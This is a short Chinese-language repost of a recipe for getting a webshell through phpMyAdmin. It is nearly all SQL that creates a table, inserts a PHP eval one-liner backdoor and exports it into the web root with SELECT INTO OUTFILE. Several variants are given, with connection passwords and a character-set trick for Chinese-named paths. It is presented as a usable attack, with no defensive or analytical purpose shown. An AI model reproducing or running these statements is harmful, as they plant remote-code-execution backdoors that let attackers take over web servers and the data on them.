轉自:http://kuxoo.com/phpMyAdmin/ [PhpMyAdmin後台拿Shell]
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma INTO OUTFILE 'E:/wamp/www/7.php';
以上同時執行,在資料庫: mysql 下建立一個表名為:xiaoma,欄位為xiaoma1,匯出到E:/wamp/www/7.php 一句話串連密碼:xiaoma
Create TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS xiaoma;
create database wutongyu(這個為資料庫名稱).
use wutongyu (串連資料庫)
create table shell(code text) (建立表shell,欄位code為文本型資料)
insert into shell(code) values ('<?php @eval($_POST['c']);?>'); (插入一句話,密碼為C)
select * from shell into outfile "D:\\detai\\AppServ\\www\\phpMyAdmin2\\shell.php" (匯出shell到絕對路徑)
PhpMyAdmin匯出WebShell至中文路徑
set character_set_client='gbk';
set character_set_connection='gbk';
set character_set_database='gbk';
set character_set_results='gbk';
set character_set_server='gbk';
select '<?php eval($_POST[cmd]);?>' into outfile 'd:\www\網站\mm.php';